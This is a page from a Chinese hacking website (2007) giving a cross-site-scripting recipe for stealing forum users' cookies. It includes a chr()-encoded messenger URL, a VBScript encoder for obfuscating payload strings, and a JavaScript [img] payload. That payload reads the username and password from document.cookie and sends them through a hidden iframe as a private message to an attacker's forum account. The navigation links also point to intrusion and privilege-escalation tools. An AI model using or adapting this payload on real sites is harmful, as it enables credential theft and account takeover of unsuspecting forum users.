黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 电脑新手 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]完美的解决跨站脚本得COOKIE弹框框的问题
      ★★★★★

完美的解决跨站脚本得COOKIE弹框框的问题

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-1-22 10:40:10

简化形式:window.open(打开的连接,窗体名,窗体大小设置)

打开的连接:

第一部份:http://xxx.xxx.xxx.xxx/xxxx/messanger.asp?action=send.....

对应编码为:chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(119)&chr(119)&chr(119)&chr(46)&chr(110)&chr(110)&chr(105)&chr(116)&chr(51)&chr(48)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(110)&chr(101)&chr(119)&chr(98)&chr(98)&chr(115)&chr(47)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(110)&chr(103)&chr(101)&chr(114)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(97)&chr(99)&chr(116)&chr(105)&chr(111)&chr(110)&chr(61)&chr(115)&chr(101)&chr(110)&chr(100)&chr(38)&chr(116)&chr(111)&chr(117)&chr(115)&chr(101)&chr(114)&chr(61)&chr(99)&chr(122)&chr(121)&chr(38)&chr(116)&chr(105)&chr(116)&chr(108)&chr(101)&chr(61)&chr(104)&chr(105)&chr(104)&chr(105)&chr(38)&chr(109)&chr(101)&chr(115)&chr(115)&chr(97)&chr(103)&chr(101)&chr(61) =版权所有  软件 下载  学院  版权所有=

不同的网站要自已改注意在哪儿结束同时还有发到的用户名都在这儿改,对于编码看如下代码:

<html>

<script language=vbs>

sub main()

base=form1.text1.value

for i=1 to len(base)

aa=asc(mid(base,i,1))

document.write "chr(" & aa & ")" & "&"

next

end sub

</script>

<body ><form name=form1><table>

<tr><td>

<input type=text name=text1 size=40><br>

<input type=button name=button1 onclick=main() value=change>

</td></tr>

</table></form></body></html>

第二部份:为提取的COOKIE中的用户名和密码

 ------------------------再来一个js的放便学习----------------------------------

[img]javascript:eval('var myCookie=documents.cookie;var iUser0=myCookie.indexOf(\'username=\');var iUser1=myCookie.indexOf(\'&\',iUser0);if(iUser1==-1) iUser1=myCookie.length;var username=myCookie.substring(iUser0+9,iUser1);var iPW0=myCookie.indexOf(\'password=\');iPW1=myCookie.indexOf(\'&\',iPW0);if(iPW1==-1) iPW1=myCookie.length;var password=myCookie.substring(iPW0+9,iPW1);document.body.insertAdjacentHTML(\'BeforeEnd\',\'<div style=display:block><iframe id=sendmessage src=messanger.asp?action=new&touser=snwcwt></iframe></div>\');sendmessage.window.document.location=\'http://www.nnit30.com/newbbs/messanger.asp?action=send&touser=snwcwt&title=\'+username+\'的密码&message=username=\'+username+\'    password=\'+password+\'\';')[/img]

上一页  [1] [2] 

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体:
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886